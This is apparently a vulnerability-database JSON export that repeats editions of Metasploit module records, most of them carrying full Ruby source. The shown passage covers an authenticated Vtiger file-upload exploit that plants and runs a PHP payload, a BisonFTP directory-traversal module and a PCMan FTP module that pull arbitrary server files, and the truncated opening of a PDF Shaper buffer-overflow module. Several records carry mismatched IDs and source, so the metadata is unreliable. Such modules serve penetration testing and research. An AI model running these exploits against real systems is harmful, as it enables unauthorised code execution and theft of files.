fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]\")\n end\n\n cookie\n end\n\n def exploit\n cookie = login\n unless cookie\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed\")\n end\n\n pay_name = rand_text_alpha(rand(5..10)) + \".php\"\n\n # Retrieve CSRF token\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n 'cookie' => cookie\n })\n\n # Grabbing CSRF token from body\n /var csrfMagicToken = \"(?<csrf>sid:[a-z0-9,;:]+)\";/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\n vprint_good(\"CSRF Token for Form Upload: #{csrf}\")\n\n stager = datastore['PHPSHORTTAG'] ? '<? ' : '<?php '\n stager << payload.encoded\n stager << ' ?>'\n\n # Setting Company Form data\n post_data = Rex::MIME::Message.new\n post_data.add_part(csrf, nil, nil, \"form-data; name=\\\"__vtrftk\\\"\") # CSRF token\n post_data.add_part('Vtiger', nil, nil, \"form-data; name=\\\"module\\\"\")\n post_data.add_part('Settings', nil, nil, \"form-data; name=\\\"parent\\\"\")\n post_data.add_part('CompanyDetailsSave', nil, nil, \"form-data; name=\\\"action\\\"\")\n post_data.add_part(stager, \"image/jpeg\", nil, \"form-data; name=\\\"logo\\\"; filename=\\\"#{pay_name}\\\"\")\n post_data.add_part('vtiger', nil, nil, \"form-data; name=\\\"organizationname\\\"\")\n data = post_data.to_s\n\n print_status(\"Uploading payload: #{pay_name}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n 'cookie' => cookie,\n 'connection' => 'close',\n 'headers' => {\n 'Referer' => \"http://#{peer}/index.php?parent=Settings&module=Vtiger&view=CompanyDetails\",\n 'Upgrade-Insecure-Requests' => '1',\n },\n 'data' => data,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n })\n\n unless res && res.code == 302\n fail_with(Failure::None, \"#{peer} - File wasn't uploaded, aborting!\")\n end\n\n # Cleanup file\n register_files_for_cleanup(pay_name)\n\n vprint_status(\"Executing Payload: #{peer}/test/logo/#{pay_name}\" )\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"test\", \"logo\", pay_name)\n })\n\n if res && res.code != 200\n fail_with(Failure::UnexpectedReply, \"#{peer} - Payload not executed\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-09T16:43:07", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 90}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-09T18:46:46", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-09-09T18:46:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-09-09T18:46:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-09T18:46:46", "differentElements": ["sourceData"], "edition": 91}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-10T00:41:41", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-09-10T00:41:41"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-09-10T00:41:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-10T00:41:41", "differentElements": ["sourceData"], "edition": 92}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-10T02:38:46", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-09-10T02:38:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-09-10T02:38:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-10T02:38:46", "differentElements": ["modified", "sourceData"], "edition": 93}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-05T19:38:37", "history": [], "viewCount": 20, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-05T19:38:37"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-05T19:38:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-05T19:38:37", "differentElements": ["cvelist", "modified", "published", "references", "sourceData", "sourceHref"], "edition": 94}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "09f75b48458c7b5570146a0d19e17859", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:08:23", "modified": "2019-10-05T17:50:30", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7601"], "cvelist": ["CVE-2015-7601"], "lastseen": "2019-10-09T01:40:19", "history": [], "viewCount": 20, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-09T01:40:19"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7601"]}, {"type": "exploitdb", "idList": ["EDB-ID:38340"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/FTP/PCMAN_FTP_TRAVERSAL"]}], "modified": "2019-10-09T01:40:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts', # initial discovery\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38340'],\n [ 'CVE', '2015-7601']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n end\n\n def check_host(ip)\n begin\n connect\n if /220 PCMan's FTP Server 2\\.0/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n # Login anonymously and open the socket that we'll use for data retrieval.\n connect_login\n sock = data_connect\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file_path} not found\")\n return\n end\n\n if response_data.length == 0 or ! (res =~ /^150/ )\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"pcman.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-09T01:40:19", "differentElements": ["cvelist", "modified", "published", "references", "sourceData", "sourceHref"], "edition": 95}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-09T03:33:03", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-09T03:33:03"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-10-09T03:33:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-09T03:33:03", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 96}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "5b127a73798ae08a29afbb5203e4504a", "type": "metasploit", "bulletinFamily": "exploit", "title": "PDF Shaper Buffer Overflow", "description": "PDF Shaper is prone to a security vulnerability when processing PDF files. The vulnerability appears when we use Convert PDF to Image and use a specially crafted PDF file. This module has been tested successfully on Win XP, Win 7, Win 8, Win 10.\n", "published": "2016-11-18T17:36:02", "modified": "2018-08-26T04:18:38", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-13T23:51:01", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-09T03:33:03"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-10-09T03:33:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/shaper_pdf_bof.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PDF Shaper Buffer Overflow',\n 'Description' => %q{\n PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'metacom27[at]gmail.com - twitter.com/m3tac0m', # POC\n 'metacom' # MSF Module\n ],\n 'References' =>\n [\n ['EDB', '37760']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process', # none/process/thread/seh\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n ['<Win Xp, Win 7, Win 8, Win 10 / PDF 